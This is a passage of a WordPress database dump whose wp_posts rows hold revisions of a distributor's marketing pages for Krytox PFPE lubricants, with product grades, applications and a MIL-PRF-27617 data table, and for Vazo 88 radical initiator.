INSERT INTO `wp_posts` VALUES (2581, 2, '2016-10-12 19:40:21', '2016-10-12 19:40:21', '<h1><strong>CHALLENGE: Overcoming high temperature lubricant degradation with Krytox™ XHT</strong></h1>\r\nConventional lubricants are subject to oxidation, attack by harsh chemicals or solvents, flammability, and volatilization of the base oil, leading to failure of the lubrication system and associated hazards. Conventional\r\nlubricant properties are often found inadequate for critical systems where failure is not an option. Krytox™ XHT greases and oils help alleviate these issues.\r\n\r\nAt the same time, conventional mineral oil lubricants begin to degrade quickly at temperatures above 93 °C (200 °F), and most alternative synthetic technologies begin to degrade quickly at temperatures above 149 °C (300 °F). When conventional oils and thickeners break down to form tars and solids that cause bearings to freeze up, frequent re-lubrication is required and component life is sacrificed. In fact, re-lubrication must occur more frequently as the temperature increases above 71 °C (160 °F). For every 10 °C (20 °F) increase in temperature, the life of the grease is cut in half, which can mean that re-lubrication is required every few hours at extreme temperatures.\r\n\r\nIf re-lubrication is missed for any reason, the equipment fails. Frequent re-lubrication, as well as frequent component outages, drive up maintenance materials and manpower cost, not to mention the substantial cost of\r\nlost production.\r\n\r\nFurthermore, recirculating oil systems are often employed to remove component heat. These can require 50x the lubricant volume of Krytox™, resulting in housekeeping, disposal, and other environmental issues. A malfunction in the recirculating oil system can very quickly result in component bearing failure.\r\n<h4><strong>What are Krytox™ XHT lubricants?</strong></h4>\r\nKrytox™ XHT lubricants are made from Chemours proprietary fluoropolymer base oils and high performance thickeners. As with all Krytox lubricants, these products provide excellent lubrication properties and are chemically inert, thermally stable, nonflammable, and non-volatile, making Krytox™ the most robust family of lubricants available.\r\n<h4><strong>SOLUTION: Krytox™ XHT lubricants take the heat and provide excellent lubrication in the harshest environments</strong></h4>\r\nThe extra high temperature (XHT) line of fluoropolymer lubricants broadens the overall Krytox™ lubrication line to address long life lubrication needs from –74 °C (–100 °F) up to 399 °C (750 °F). Specifically, Krytox XHT greases are designed for applications in the 204–399 °C (400–750 °F) temperature range for use in bearings, gears, chains, O-rings, sliding, and other mechanical components. These products are excellent for use in many harsh industrial applications and are currently used in mining, metal processing, power generation, textile, aviation, baking, and chemical applications.\r\n\r\nKrytox™ XHT-AC grease was recently applied in a line of copper rod mill sizing bearings. These bearings run at temperatures of 204–260 °C (400–500 °F). Before Krytox™, a standard lithium-thickened mineral oil was\r\napplied daily; the bearing life was typically 1–2 weeks. After applying Krytox™ XHT-AC grease, bearings have been running for over six months with no failures. The bearings were inspected and re-lubricated after four\r\nmonths and look to be in excellent condition. Using Krytox™ has resulted in substantial savings in man-hours and bearing replacement cost, as well as a significant increase in uptime.\r\n\r\nKrytox™ XHT-BDX was also applied to dampers in a power plant-fired boiler that control a 371 °C (700 °F) air stream. Graphite had been used previously, resulting in damper sticking and loss of control. Krytox™ XHT-BDX was installed in March 2000, and dampers have operated trouble free since that time. Krytox XHT-AC has been in use for 18 months in a waffle-baking oven bearing application at temperatures from 260–315 °C (500–600 °F). Krytox XHT-BDX is currently being used as an O-ring lubricant for aircraft environmental control systems. This system diverts engine exhaust to the wings for de-icing purposes. No other lubricant could withstand the 315°C (600 °F) temperatures of engine exhaust.\r\n<h4><strong>PERFORMANCE: Krytox™ XHT—The lubricant for hot, hot, hot applications</strong></h4>\r\nIncreased uptime and reduced maintenance costs lead to higher productivity. More reliable equipment with consistent performance reduces quality problems and waste. Unscheduled shutdowns are avoided and safety is increased, because there is less time spent around hot equipment.\r\n\r\nKrytox™ XHT lubricants are ideal for your high temperature lubrication systems. Besides the ability to work in harsh environments and high temperatures, Krytox™ XHT lubricants provide typical savings that are 10–100 times or more the cost of the lubricant. What are you waiting for?\r\n\r\n[ux_product_categories ids="115,116" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">Click here</a> to learn more about Krytox™ XHT.\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox™ XHT Takes the Heat', '', 'inherit', 'closed', 'closed', '', '2375-revision-v1', '', '', '2016-10-12 19:40:21', '2016-10-12 19:40:21', '', 2375, 'https://www.miller-stephenson.com/2375-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2582, 2, '2016-10-12 19:42:01', '2016-10-12 19:42:01', '<strong>Krytox™ Lube For Life</strong>\r\n\r\n<strong>A North American company improves equipment reliability by switching lubricants.</strong>\r\n\r\nA major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without incurring additional costs for equipment or manpower.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nFor this application, the pulp and paper mill needed a ball bearing lubricant that could last the expected lifetime of their motors without the implementation of a cost prohibitive re-lubrication process. The mill\'s reliability superintendent knew he could not afford to implement a system that relied upon ongoing re-greasing because of the additional equipment needed, unavoidable downtime and labor costs. However, he also realized that a more sophisticated greasing program was necessary to meet the increasing recommendations of industry experts and to avoid rebuilding and/or replacing failed motors.\r\n\r\n<strong>The Solutions</strong>\r\n\r\nAfter researching available options, the reliability superintendent turned to Krytox™ for help. Working with the Krytox™ technical service team, the mill implemented the use of Krytox™ grease AUT 2E45 on 100 motors as a pilot and the mill is now able to run its electric motors for their expected lifetime with no bearing failures attributed to lubrication. Switching to Krytox™ lubricants also avoided having to implement a re-lubrication process all together, saving significant manpower and downtime. The end result was a cost-effective, simplified process that not only met, but exceeded their expectations.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox™ lubricant AUT 2E45, the pulp and paper mill was able to extend the service life of its electric motors and help ensure long-term reliability of the motor\'s ball bearings.</li>\r\n 	<li>Krytox™ lubricant AUT 2E45 enabled the mill to avoid implementing a cost re-lubrication process.</li>\r\n 	<li>Krytox™ lubricants can be used in other electric motor applications to prevent oxidation and ensure no lubricant gum-up or breakdown for the lifetime of the motor. Excellent film-forming viscosity also enables the electric motors to spin with less resistant friction, leading to less maintenance and fewer bearing replacements.</li>\r\n</ul>\r\nKrytox™ greases offer the potential for lube for life lubrication in demanding electrical motor service. Krytox™ greases are non-oxidizing, water resistant, non-flammable and chemically inert.\r\n\r\nKrytox™ greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener. The PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox™ greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox™ greases provide a thicker oil layer and reduce wear. Krytox™ greases are compatible with metals and most seal materials, but require removal of all old lubrications from the motor bearings before application.\r\n\r\n[ux_product_categories ids="37" number="10"]\r\n\r\nTo learn more about Krytox™ Lube for Life greases please click <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">this link.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox™ Lube For Life', '', 'inherit', 'closed', 'closed', '', '1117-revision-v1', '', '', '2016-10-12 19:42:01', '2016-10-12 19:42:01', '', 1117, 'https://www.miller-stephenson.com/1117-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2583, 3, '2016-10-12 19:47:21', '2016-10-12 19:47:21', 'Vazo 88 radical initiator, also known as ACHN (1,1’-Azobis(cyanocyclohexane)), is an azo radical initiator source typically used as a polymerization initiator. Vazo 88 is used principally in higher temperature polymerizations with excellent solubilty in a wide variety of organic solvents. Vazo 88 will thermally decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity. Benefits include:\n<ul>\n 	<li>Higher temperature activation</li>\n 	<li>Does not compete in costly sides reactions</li>\n 	<li>Head-to-Tail polymerization</li>\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\n 	<li>Can polymerize oxidation susceptible compound</li>\n</ul>\n<a href="https://www.miller-stephenson.com/vazo-free-radical-initiator/">For more information on Vazo radical initiators see our article section</a>\n\nAll the grades are Vazo radical Initiators are essentially insoluble in water, sparingly soluble in aliphatic hydrocarbons, and soluble in functionalized organic compounds and aromatic hydrocarbons. Vazo 88 radical initiator is significantly more soluble in organic solvents and monomers than the other grades. Caution must be used in the handling of highly concentrated solutions to avoid a self-accelerating decomposition.\n\nSolvent-Soluble Vazo™ free radical sources offer a number of advantages over organic peroxides.\n<ul>\n 	<li>More stable than most peroxides, so can be stored under milder conditions and are not shock-sensitive.</li>\n 	<li>Decompose with first-order kinetics; not sensitive to metals, acids, and bases; not susceptible to radical-induced decompositions. This makes Vazo™ free radical sources more efficient and predictable than other free radical sources.</li>\n 	<li>Produce less energetic radicals than peroxides, so there is less branching and cross-linking.</li>\n 	<li>Are weak oxidizing agents, which lets them be used to polymerize unsaturated amines, mercaptans, and aldehydes without affecting pigments and dyes.</li>\n 	<li>Are available in four grades to use over a wide temperature range.</li>\n</ul>\n<p class="largeText">Vazo™ free radical sources initiate the addition of compounds such as chlorine, hydrogen sulfide, thiols, and phosphines across double bonds. Vazo™ reacts with unsaturated compounds in equimolar amounts to give monomers and oligomers, which contain two Vazo™-derived groups. These dinitriles can be further converted to amides, amines, or acids. Vazo™ free radical sources initiate halogenations as well as the air oxidation of aromatic and aliphatic hydrocarbons, acrylonitrile, methyl methacrylate, and vinyl acetate. Vazo™ free radical sources release nitrogen gas when used, which can be used as a blowing agent.</p>\nFor safety, the maximum storage temperatures are as follows: Vazo™ 52 (10°C [50°F]); Vazo™ 64 and Vazo™ 67 (24°C [75°F]); Vazo™ 88 (35°C [95°F]);', 'VAZO 88', 'Vazo 88, also known as ACHN (1,1’-Azobis(cyanocyclohexane)), is a free radical source (FRS) typically used as a polymerization initiator. Vazo 88 is used principally in higher temperature polymerizations with excellent solubilty in a wide variety of organic solvents. Vazo 88 will thermally decomposes to generate free radicals and nitrogen gas. More cost-effective than organic peroxides of comparable activity. Benefits include:\n<ul>\n 	<li>Higher temperature activation</li>\n 	<li>Does not compete in costly sides reactions</li>\n 	<li>Head-to-Tail polymerization</li>\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\n 	<li>Can polymerize oxidation susceptible compound</li>\n</ul>\n\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/vazo-frs-product-banner-e1474375765567.jpg" alt="Vazo Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '577-autosave-v1', '', '', '2016-10-12 19:47:21', '2016-10-12 19:47:21', '', 577, 'https://www.miller-stephenson.com/577-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2584, 2, '2016-10-12 19:43:47', '2016-10-12 19:43:47', '<h4><strong>Which Krytox product is right for your application?</strong></h4>\r\nKrytox product(s) are perfluoropolyether oils and greases are available in a variety of grades for many types of applications. This Product Selection Guide provides general properties and cites the technical data reference document where additional information can be found. “Krytox Performance Lubricants Product Overview” gives basic information about all of the grades.\r\n\r\nTypical Krytox product lubricant applications include: paint plant conveyor bearings, corrugator and paper machine bearings, robotics, welding machines, high temperature fans, textile equipment, tenter frames, high temperature ovens, conveyor systems in glass and aluminum plants, textile calendar roll bearings, brick kiln car bearings, valve lubrication, ventilation fan bearings, rod mills, valves, valve actuators, automobile\r\nalternators, viscous fan clutches, pumps, sealed-forlife bearings, critical equipment where failure cannot be tolerated, and severe service applications.\r\n<h4><strong>Krytox General-Purpose Oils and Greases</strong></h4>\r\nThe Krytox GPL 10X oil /20X grease series contains no additives and can be used on components that may come in contact with all chemicals, including acids, bases, solvents, and other reactive chemicals. Typical applications include valves, bearings, seal barrier fluids, instruments, and oxygen systems.\r\n\r\nThe Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications.\r\n\r\nThe Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments. Typical applications include automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.\r\n\r\nKrytox GPL 29X greases have EP and anti-corrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection. For additional information, refer to “Krytox Lubricants for Extreme Pressure Applications with Anti- Corrosion Additives.”\r\n\r\nKrytox GPL 2EX lubricants are formulated using new antirust additives. This grease is similar to Krytox GPL 22X series greases, but contains a non-nitrite anti-corrosion additive. For further information, refer to “Krytox Extra High Temperature (XHT) Products.”\r\n<h4><strong>Krytox Lubricants for Aerospace Applications</strong></h4>\r\nKrytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.\r\n\r\nKrytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but in a grease form. Krytox 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specification.\r\n<h4><strong>Krytox Vacuum Pump Fluids</strong></h4>\r\nKrytox vacuum pump fluids are used in vacuum pumps and vacuum systems where controlled vapor pressure, nonflammability, and non-reactivity are needed. Krytox vacuum pump fluids can be regenerated and reused.\r\n<h4><strong>Krytox Extra High Temperature Products</strong></h4>\r\nKrytox XHT- S and XHT-SX greases are high temperature greases. These greases are designed to work best at temperatures over 204 °C (400 °F), but below 300 °C (572 °F). For more specific information, refer to\r\n“Krytox XHT Grease.”\r\n\r\nKrytox XHT- AC and XHT-ACX greases are high temperature greases that contain anti-corrosion/anti-wear inhibitors. These greases are designed to work best at temperatures over 204 °C (400 °F), but under 300 °C (572 °F).\r\n\r\nKrytox XHT- BD, XHT-BDX, and XHT-BDZ greases are designed for use where temperatures are in the 288–399 °C (550–750 °F) range and there is a danger of melting the standard PTFE thickener. These greases use a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The grease is slightly tacky, and it will coat the surface and stay in place. For additional information, refer to “Krytox XHT Grease with Special Non-Melting Thickener.”\r\n<h4><strong>Krytox Lubricant Specialty Products</strong></h4>\r\nSpecialty products include:\r\n<ul>\r\n 	<li>H-1 rated food grade lubricants (discussed in more detail in “Krytox General-Purpose Greases and Oils”)</li>\r\n 	<li>Krytox NRT lubricants for oxygen systems and reactivegases</li>\r\n 	<li>Krytox XP lubricants with soluble additives</li>\r\n 	<li>Wide temperature range, high vacuum linear PFPE products</li>\r\n</ul>\r\n<h4><strong>Other Considerations</strong></h4>\r\nMany factors affect the performance of a grease and bearing, and those factors can affect grease and component life as well. Standard grease consistency is NLGI Grade 2 penetration. Sometimes, a harder Grade 3 grease or softer Grade 1 grease is needed and can be ordered. For example, softer Grade 00 or 0 greases are often used in gearboxes. In bearing applications, different types of bearings place different stresses on grease; ball bearings cause little stress, whereas roller bearings will tend to grind and work the grease severely. This stress can shorten grease life and require more frequent re-lubrication or result in the need for more viscous base oil in the grease. This Product Selection Guide is a starting point to help in the selection of the Krytox lubricant suitable for your tough applications.\r\n<h4><strong>To view our line of Krytox products see below:</strong></h4>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nTo learn more about Krytox product(s) please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a>', 'Krytox Product Selection Guide', '', 'inherit', 'closed', 'closed', '', '2317-revision-v1', '', '', '2016-10-12 19:43:47', '2016-10-12 19:43:47', '', 2317, 'https://www.miller-stephenson.com/2317-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2585, 2, '2016-10-12 19:46:40', '2016-10-12 19:46:40', '<h1><strong>MIL PRF-27617 Greases</strong></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox™ oils and MIL PRF-27617 greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox™ oils and greases are silicone free and do not damage plastics or elastomers, or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial, and semiconductor applications, as well as solving many other routine lubrication problems.\r\n\r\nKrytox™ greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written.\r\n\r\nThis is the latest data from the recertification that is required every five years. Krytox™ greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n<h4><strong>Typical Applications</strong></h4>\r\nApplications for Krytox™ lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity, or down time, Krytox™ is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox™ oils and greases are applied on various settings, spanning from bearings and sealants to O-rings and oxygen systems. Krytox™ is a valuable asset to the aerospace industry, due to its superior performance in a wide range of temperatures scaling from 70 to 399 ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox™ lubricants are compatible with all metals, elastomers, plastics, paints, and finishes. Due to the intense and severe circumstance of the\r\naerospace industry, it can be expected that Krytox™ delivers a high level of product excellence.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">Krytox™  240 AC, 240 AB, and 240 AZ</a> gr-1 are MIL PRF-27617 greases and now have <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF approval for incidental food contact (H-1)</a> in and around food processing areas.\r\n<h4><strong>Preparation Before Packing Bearings With Grease</strong></h4>\r\nNew bearings and equipment that are not lubricated often have rust preventive oils in them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The greases or preservative oils need to be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on uncleaned bearings have shown reduced life in high temperature, high speed tests, where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting, so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They also will oxidize and harden, and can create debris that will contaminate the grease.\r\n<h4><strong>Storage and Shelf Life</strong></h4>\r\nKrytox™ grease and oil lubricants have an indefinite shelf life, if unopened and stored in a clean dry location.\r\n\r\nCAGE No.: 43S57\r\n\r\nSIC Code: 2992 Lubricating Oils and Greases\r\n\r\nNAICS Code: 324191 Lubricating Oils and Greases Manufacturing\r\n\r\nDUNS: 557214574\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> MIL PRF-27617 Greases</strong></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240az/"><strong>240 AZ</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ab/"><strong>240 AB</strong></a></td>\r\n<td style="text-align: center;" width="206"><a href="https://www.miller-stephenson.com/product/krytox-240ac/"><strong>240 AC</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Qualification Reference Number, 1 Oct 2008</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-011</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-012</td>\r\n<td style="text-align: center;">AFPET/PTPT 08-013</td>\r\n</tr>\r\n<tr>\r\n<td>Grease Type/Operating Range, °C (°F)</td>\r\n<td style="text-align: center;" width="206">Type I/–54 to 149\r\n(–65 to 300)</td>\r\n<td style="text-align: center;" width="206">Type II/–40 to 204\r\n(–40 to 399)</td>\r\n<td style="text-align: center;" width="206">Type III/–34 to 288\r\n(–29 to 550)</td>\r\n</tr>\r\n<tr>\r\n<td>NATO Number</td>\r\n<td style="text-align: center;">G-397</td>\r\n<td style="text-align: center;">G-398</td>\r\n<td style="text-align: center;">G-399</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration Grade</td>\r\n<td style="text-align: center;">NLGI 1</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n<td style="text-align: center;">NLGI 2</td>\r\n</tr>\r\n<tr>\r\n<td>Change in Worked Penetration (30 max.)</td>\r\n<td style="text-align: center;">13</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">–3</td>\r\n</tr>\r\n<tr>\r\n<td>Corrosion on Copper (2b max.)</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n<td style="text-align: center;">1b</td>\r\n</tr>\r\n<tr>\r\n<td width="250">High Temperature Bearing Performance\r\n(500 hr min. at 10,000 RPM, 204 °C [399 °F])</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">Stopped at 1,320 hr</td>\r\n<td style="text-align: center;">Stopped at 1,685 hr</td>\r\n</tr>\r\n<tr>\r\n<td>Evaporation ASTM D-2595, %</td>\r\n<td style="text-align: center;">12.9</td>\r\n<td style="text-align: center;">10.1</td>\r\n<td style="text-align: center;">0.2</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Separation, %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">14.2</td>\r\n<td style="text-align: center;">15.5</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Fuel (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.3</td>\r\n<td style="text-align: center;">0.1</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;" width="250">Liquid Oxygen Impact Sensitivity\r\n20 impacts at 43.3 in, no reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n<td style="text-align: center;">No Reaction</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Water Washout Characteristics (20% max.), %</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.25</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td>Oxidation Stability (5 max.), psi</td>\r\n<td style="text-align: center;">—</td>\r\n<td style="text-align: center;">0.5</td>\r\n<td style="text-align: center;">—</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Dirt Count\r\n75 μ and larger (0 per cc max.)\r\n25 to 74 μ (1000 per cc max.)</td>\r\n<td style="text-align: center;">0/26</td>\r\n<td style="text-align: center;">0/0</td>\r\n<td style="text-align: center;">0/0</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Resistance to Aqueous Solution\r\nDistilled Water\r\n50/50 Distilled Water/Ethanol</td>\r\n<td width="206">\r\n<p style="text-align: center;">Pass\r\nPass</p>\r\n</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n<td style="text-align: center;" width="206">Pass\r\nPass</td>\r\n</tr>\r\n<tr>\r\n<td>Film Stability and Corrosion on Steel</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n<td style="text-align: center;">Pass</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Base Oil Viscosity, 40 °C (104 °F), cSt</td>\r\n<td style="text-align: center;">22.8</td>\r\n<td style="text-align: center;">77.8</td>\r\n<td style="text-align: center;">243</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ Useful Range, °C</td>\r\n<td style="text-align: center;">–57 to 149</td>\r\n<td style="text-align: center;">–40 to 232</td>\r\n<td style="text-align: center;">–34 to 288</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/krytox/">If these greases are not right for you, please click here to learn more about Krytox greases and oils.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox MIL PRF-27617 Greases—Grease, Aircraft and Instrument, Fuel- and Oxidizer-Resistant', '', 'inherit', 'closed', 'closed', '', '2552-revision-v1', '', '', '2016-10-12 19:46:40', '2016-10-12 19:46:40', '', 2552, 'https://www.miller-stephenson.com/2552-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2586, 2, '2016-10-12 19:47:41', '2016-10-12 19:47:41', '<h1><strong>Krytox™ Automotive Bearing Lubrication Applications</strong></h1>\r\n<h4><strong>High Performance Lubricants That Work in Demanding Real-Life Applications</strong></h4>\r\nReliable high-performance fluoropolymer lubricants from Chemours can stand up to even extreme conditions. Krytox™ oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry. Superior product performance, lower overall maintenance systems cost, and a lower environmental footprint help to meet rising consumer expectations. For automotive manufacturers, this provides the opportunity to offer extended warranties and enjoy improved productivity through reduced component failure.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">Krytox™ oils and greases</a> are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 288°C (550 °F), and higher temperatures for shorter periods, depending on product grade limits. Krytox™ oils and greases are exceptionally safe, reliable, and offer environmental benefits as well as longer lubricant life. These oils and greases will not burn or support combustion, even in 100% liquid or gaseous oxygen, nor will they degrade or break down in the presence of aggressive chemicals. In automotive applications, Krytox™ oils and greases deliver low\r\ntemperature starting performance, while maintaining efficacy at higher temperatures. These oils and greases can increase service life of critical components, allowing them to run more quietly and last longer, for superior, reliable performance.\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™ Oils and Greases</a></td>\r\n<td style="text-align: center;" width="206">Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Temperature Range, °C (°F)</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">GPL 204</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">GPL 214</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">GPL 224</a>, GPL 294, GPL 2E4, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">XP2A4</a></td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">–51–179 (–60–354)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">AUT 2E45, AUT 2245, AUT 2045, AUT 2A45</a></td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">–40–200 (–40–392)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">GPL 205</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">GPL 215</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">GPL 225</a>, GPL 295, GPL 2E5, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">XP2A5</a></td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">–36–210 (–33–410)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Krytox™—Products for the Automotive Industry</strong></h4>\r\nSeveral grades of Krytox™ oil and grease are suitable for automotive use, depending on the application type and temperature range encountered. The table above lists the most common grades currently being used. More detailed data is available on the web at <a href="https://www.miller-stephenson.com/krytox/">www.miller-stephenson.com/krytox.</a> <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">Solutions for automotive industries can be found by clicking here.</a>\r\n\r\n<img class="size-medium wp-image-2504 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-bearing-lubrication-800x465.jpg" alt="automotive-bearing-lubrication" width="800" height="465" />\r\n\r\n<strong>Proven Applications</strong>\r\n\r\n<strong>Fan Clutch</strong>\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and high viscosity, providing long life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\n<strong>Alternator</strong>\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators and, hence, the bearings get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure. As the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation. This reduces the alternator’s performance and robs performance from the rest of the automobile. Perhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running.\r\n\r\nThe higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced and reliable, heat-stability and performance of Krytox™ greases.\r\n<h4><strong>Clutch Pilot Automotive Bearing</strong></h4>\r\nThe pilot bearings support the clutch-end of the transmission shaft. If the lubricant in the pilot bearing fails, the transmission itself will fail. Pilot bearings lubricated with Krytox™ high performance lubricants will last longer and perform better than those lubricated with other synthetic lubricants, due to the high-load capability and chemical inertness of Krytox™ products.\r\n<h4><strong>Cooling Fan</strong></h4>\r\nTo maximize performance, an automobile’s engine must run at its optimal temperature (typically around 93 °C [200 °F]), which is controlled by the cooling system. One component of the system is the cooling fan, which blows air through the radiator, removing excess heat. Failure in the cooling fan’s bearings leads to failure of the fan, which will eventually result in overheating of the engine. The sintered bearings used in cooling fans often fail in two ways: either the lubricant volatilizes, or it degrades through oxidation. The use of Krytox™ prevents both of these modes of failure, due to its low volatility and unsurpassed resistance to oxidation.\r\n<h4><strong>Heavy Duty Truck Automatic Clutch</strong></h4>\r\nIn many heavy duty trucks, the engines have a much lower rpm upper limit. In order to prevent the engine from being destroyed, an automatic clutch is used. When the set maximum rpm limit is reached, the automatic clutch disengages and notifies the driver to shift gears. This both prevents engine damage and increases ease of operation. The bearings present in the clutch are critical to its operation and must receive adequate lubrication in order to work properly. Lubricating with Krytox™ mid-range viscosity and low volatility lubricants reduces 